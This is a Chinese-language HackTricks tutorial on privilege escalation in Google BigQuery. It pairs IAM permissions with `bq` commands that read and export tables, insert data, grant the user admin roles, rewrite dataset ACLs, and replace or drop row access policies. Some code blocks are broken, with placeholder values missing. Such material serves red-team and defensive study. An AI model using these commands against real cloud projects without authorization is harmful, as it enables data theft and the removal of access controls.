GCP - BigQuery Privesc

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

BigQuery

有关 BigQuery 的更多信息请参见:

GCP - Bigquery Enum

读取表

读取存储在 BigQuery 表中的信息,可能会发现敏感信息。访问这些信息需要以下权限: bigquery.tables.getbigquery.jobs.createbigquery.tables.getData:

读取 BigQuery 表数据 ```bash bq head . bq query --nouse_legacy_sql 'SELECT * FROM `..` LIMIT 1000' ```

导出数据

这是访问数据的另一种方式。将其导出到 cloud storage bucket下载包含信息的文件
执行此操作需要以下权限:bigquery.tables.export, bigquery.jobs.createstorage.objects.create

将 BigQuery 表导出到 Cloud Storage ```bash bq extract .
"gs:///table*.csv" ```

插入数据

可能可以在 Bigquery 表中引入某些受信任的数据,以利用其他位置的漏洞。这可以通过权限 bigquery.tables.get , bigquery.tables.updateDatabigquery.jobs.create 轻松实现:

将数据插入 BigQuery 表 ```bash # Via query bq query --nouse_legacy_sql 'INSERT INTO `..` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

Via insert param

bq insert dataset.table /tmp/mydata.json

</details>

### `bigquery.datasets.setIamPolicy`

攻击者可以滥用此权限,**为自己授予对 BigQuery 数据集的更多权限**:

<details>
<summary>在 BigQuery 数据集上设置 IAM 策略</summary>
```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

仅此权限就允许通过修改指示谁可以访问的 ACLs 来更新您对 BigQuery 数据集的访问权限

更新 BigQuery 数据集的 ACLs ```bash # Download current permissions, reqires bigquery.datasets.get bq show --format=prettyjson : > acl.json ## Give permissions to the desired user bq update --source acl.json : ## Read it with bq head $PROJECT_ID:.
```

bigquery.tables.setIamPolicy

攻击者可以滥用此权限来为自己授予对 BigQuery 表的更多权限

在 BigQuery 表上设置 IAM 策略 ```bash # For this you also need bigquery.tables.setIamPolicy bq add-iam-policy-binding \ --member='user:' \ --role='roles/bigquery.admin' \ :.

use the set-iam-policy if you don’t have bigquery.tables.setIamPolicy

</details>

### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

根据文档,具有上述权限可以**更新行访问策略。**\
但是,**使用 CLI `bq`** 时还需要额外权限:**`bigquery.rowAccessPolicies.create`**、**`bigquery.tables.get`**。

<details>
<summary>创建或替换行访问策略</summary>
```bash
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

可以在 row policies enumeration 的输出中找到 filter ID。示例:

列出 row access policies ```bash bq ls --row_access_policies :.

Id Filter Predicate Grantees Creation Time Last Modified Time

apac_filter term = “Cfba” user:asd@hacktricks.xyz 21 Jan 23:32:09 21 Jan 23:32:09

</details>

如果你有 **`bigquery.rowAccessPolicies.delete`** 而不是 `bigquery.rowAccessPolicies.update`,你也可以直接删除该策略:

<details>
<summary>删除行访问策略</summary>
```bash
# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Caution

另一个可能绕过行访问策略的选项是直接更改受限数据的值。如果你只能看到当 termCfba 时的记录,可以将表中所有记录修改为 term = "Cfba"。但这会被 bigquery 阻止。

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks